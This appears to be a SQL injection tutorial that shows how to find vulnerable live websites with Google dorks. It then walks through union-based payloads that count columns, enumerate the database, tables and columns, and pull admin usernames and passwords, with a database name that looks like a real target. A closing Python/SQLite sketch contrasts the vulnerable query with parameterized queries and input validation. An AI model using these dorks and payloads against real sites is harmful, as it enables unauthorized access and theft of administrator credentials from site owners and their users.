SQL injection

A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

Finding a SQL-vulnerable site: to find a SQL-vulnerable website, we will use some of the following Google dorks:

inurl:index.php?id=   inurl:trainers.php?id=  inurl:buy.php?category=  inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:Pageid=

Step 1: Finding Vulnerable Link –

http://www.site.com/news.php?id=3

Add ' after id=3

If a SQL syntax error or a blank page is shown, then the site is vulnerable to SQL injection.

Step 2: Finding Vulnerable Columns –

http://www.site.com/news.php?id=3

order by 8 --

If an error or a blank page is shown again, then the number of columns is 7.

Step 3: Finding Number of Vulnerable Columns:

http://www.site.com/news.php?id=3

union all select 1,2,3,4,5,6,7 --

If the number 2 is shown on the page, then this column can give us the database, tables and columns.

Step 4: Finding Database:

union all select 1,database(),3,4,5,6,7 --

chennaisilks

Step 5: Finding Table Names:

http://www.site.com/news.php?id=3

union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema='chennaisilks' --

Step 6: Finding Column Names:

http://www.site.com/news.php?id=3

union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='chennaisilks' --

Admin table is admin

Admin Columns are

admin_id

user_id

admin_pwd

admin_email

admin_last_login

admin_ip

Step 7: Finding Admin username & password:

http://www.site.com/news.php?id=3

union all select 1,user_id,3,4,5,6,7 from admin --

union all select 1,admin_pwd,3,4,5,6,7 from admin --
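
The queries in the steps above only work because the application pastes the id parameter into the SQL text. As an added example (not from the original post), this Python/SQLite sketch puts that vulnerable pattern beside a parameterized query and an input check. The table contents, function names and the use of SQLite in place of the site's PHP/MySQL stack are assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data: a news table and an admin table, in memory."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (admin_id INTEGER, user_id TEXT, admin_pwd TEXT);
        INSERT INTO news VALUES (3, 'Store opening', 'constructed article text');
        INSERT INTO admin VALUES (1, 'site_admin', 'constructed-hash-value');
    """)
    return db

def news_vulnerable(db, raw_id):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so anything after the number is parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def news_parameterized(db, raw_id):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def news_validated(db, raw_id):
    # Defense in depth: reject anything that is not a plain integer id
    # before it reaches the database layer.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    return news_parameterized(db, int(raw_id))

# Constructed input in the shape of the step 7 query (3 columns here, not 7).
INJECTED = "3 union all select 1,user_id,admin_pwd from admin --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", news_vulnerable(db, INJECTED))
    print("parameterized:", news_parameterized(db, INJECTED))
    print("normal id    :", news_validated(db, "3"))
```

With the bound parameter the whole input is compared to the id column as a single value, so the union never executes and no admin row is returned.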
